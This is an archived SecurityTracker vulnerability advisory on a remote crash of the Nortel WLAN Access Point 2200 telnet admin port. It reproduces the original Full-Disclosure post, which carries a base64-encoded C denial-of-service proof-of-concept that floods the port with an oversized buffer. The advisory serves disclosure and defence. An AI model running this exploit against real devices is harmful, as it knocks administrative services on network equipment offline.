SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Nortel WLAN Access Point Vendors:   Nortel
Nortel Wireless LAN Access Point 2200 Admin Port Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1009294
SecurityTracker URL:  http://securitytracker.com/id/1009294
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 2 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): LAN AP 2200
Description:   A vulnerability was reported in the Nortel Wireless LAN Access Point 2200. A remote user can crash the administrative telnet service.

It is reported that Alex Hernandez discovered that a remote user can send a specially crafted request to port 23 on the target device to cause the telnet service to crash. Subsequent requests from authorized clients will not be accepted, the report said.

According to the report, the telnet and http ports are enabled by default, as are the debugging features.

Mark Ludwik has provided some demonstration exploit code, available in the Source Message [it is Base64 encoded].

Impact:   A remote user can cause the administrative telnet service to crash. [Editor's note: It may be that a remote user can cause the entire device to crash, but that is not clear from the report.]
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.nortel.com/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Nortel Networks Wireless LAN Access Point 2200 DoS + PoC


--Hush_boundary-4043f9e13e683
Content-type: text/plain


CISSP/MCP
-Mark 


--Hush_boundary-4043f9e13e683
Content-type: application/octet-stream; name="Wlan-DoS.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Wlan-DoS.c"

LyogV0xBTi1Eb1MuYyANCiAqIA0KICogTm9ydGVsIE5ldHdvcmtzIFdpcmVsZXNzIExBTiBBY2Nl
c3MgUG9pbnQgMjIwMCBEb1MgKyBQb0MNCiAqIGRpc2NvdmVyZWQgYnkgQWxleCBIZXJuYW5kZXou
DQogKiANCiAqIENvcHlyaWdodCAoQykgMjAwNCAgQWxleCBIZXJuYW5kZXouDQogKg0KICogQSBz
dWNjZXNzZnVsIGF0dGFjayBvbiBhIHZ1bG5lcmFibGUgc2VydmVyIGNhbiBjYXVzZSB0aGUgQVAN
CiAqIChBY2Nlc3MgUG9pbnQpIGxpc3RlbmVyIHRvIGZhaWwgYW5kIGNyYXNoLiBUaGUgcG9ydCAy
MyAodGVsbmV0KQ0KICogZnVuY3Rpb25hbGl0eSBjYW5ub3QgYmUgcmVzdG9yZWQgdW50aWwgdGhl
IGxpc3RlbmVyIGlzIG1hbnVhbGx5IHJlc3RhcnRlZC4NCiAqIA0KICogTEFOIEFQIDIyMDAgcGVy
bWl0cyBjbGllbnQtc2VydmVyIGNvbW11bmljYXRpb24gYWNyb3NzIGFueSBuZXR3b3JrLiANCiAq
IExBTiBlbmFibGVzIGJ5IGRlZmF1bHQgdGhlIHBvcnQgMjMgKHRlbG5ldCkgYW5kIHBvcnQgKDgw
KSBmb3IgYWRtaW5pc3RlcmluZy4NCiAqIERlYnVnZ2luZyBmZWF0dXJlcyBhcmUgZW5hYmxlZCBi
eSBkZWZhdWx0LCBpZiBMQU4gQVAgZW5jb3VudGVycyBzdWNoIGEgcmVxdWVzdCwNCiAqIGl0IHdp
bGwgY3Jhc2ggYW5kIG5vIGxvbmdlciBmaWVsZCBBUCByZXF1ZXN0cyBmcm9tIGF1dGhvcml6ZWQg
Y2xpZW50cy4NCiAqDQogKiBTaW1wbGUgbGFtZSBjb2RlIGJ5DQogKg0KICogLU1hcmsgTHVkd2lr
IDpHZXJtYW55DQogKiANCiAqDQogKi8NCiANCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUg
PHN0ZGxpYi5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0K
I2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCg0KaW50IG1h
aW4oaW50IGFyZ2MsIGNoYXIgKmFyZ3ZbXSkgew0KIGlmKGFyZ2MgPCAzKSB7DQogIHByaW50Zigi
XG5XTEFOIE5vcnRlbE5ldHdvcmtzIEFQIERvUyBleHBsb2l0IGJ5IE1hcmsgTHVkd2lrXG5cbiIp
Ow0KICBwcmludGYoIlVzYWdlOiBXbGFuRG9TIFtBUC9Ib3N0XSBbcG9ydF1cblxuIik7DQogIGV4
aXQoLTEpOw0KIH0NCg0KIGludCBzb2NrOw0KIGNoYXIgZXhwbGJ1ZlsyMDI0XTsNCiBzdHJ1Y3Qg
c29ja2FkZHJfaW4gZGVzdDsNCiBzdHJ1Y3QgaG9zdGVudCAqaGU7DQoNCiBpZigoaGUgPSBnZXRo
b3N0YnluYW1lKGFyZ3ZbMV0pKSA9PSBOVUxMKSB7DQogIHByaW50ZigiQ291bGRuJ3QgcmVzb2x2
ZSAlcyFcbiIsIGFyZ3ZbMV0pOw0KICBleGl0KC0xKTsNCiB9DQoNCiBpZigoc29jayA9IHNvY2tl
dChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkpID09IC0xKSB7DQogIHBlcnJvcigic29ja2V0KCki
KTsNCiAgZXhpdCgtMSk7DQogfQ0KDQogcHJpbnRmKCJcbldMQU4gTm9ydGVsTmV0d29ya3MgQVAg
RG9TIGV4cGxvaXQgYnkgTWFyayBMdWR3aWtcblxuIik7DQogDQogZGVzdC5zaW5fYWRkciA9ICoo
KHN0cnVjdCBpbl9hZGRyICopaGUtPmhfYWRkcik7DQogZGVzdC5zaW5fcG9ydCA9IGh0b25zKGF0
b2koYXJndlsyXSkpOw0KIGRlc3Quc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoNCiBwcmludGYoIlsr
XSBFeHBsb2l0IGJ1ZmZlci5cbiIpOw0KIG1lbXNldChleHBsYnVmLCAnQScsIDIwMjQpOw0KIG1l
bWNweShleHBsYnVmKzIwMjQsICJcblxuXG5cblxuXG5cblxuIiwgOCk7DQoNCiBpZihjb25uZWN0
KHNvY2ssIChzdHJ1Y3Qgc29ja2FkZHIgKikmZGVzdCwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikp
ID09IC0xKSB7DQogIHBlcnJvcigiY29ubmVjdCgpIik7DQogIGV4aXQoLTEpOw0KIH0NCg0KIHBy
aW50ZigiWytdIENvbm5lY3RlZC4uLlxuIik7DQogcHJpbnRmKCJbK10gU2VuZGluZyBEb1MgYXR0
YWNrLi4uIVxuIik7DQoNCiBzZW5kKHNvY2ssIGV4cGxidWYsIHN0cmxlbihleHBsYnVmKSwgMCk7
DQogc2xlZXAoMik7DQogY2xvc2Uoc29jayk7DQogcHJpbnRmKCJcblsrXSBDcmFzaCB3YXMgc3Vj
Y2Vzc2Z1bCAhXG4iKTsNCiByZXR1cm4oMCk7DQp9DQoNCg0K

--Hush_boundary-4043f9e13e683--



Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC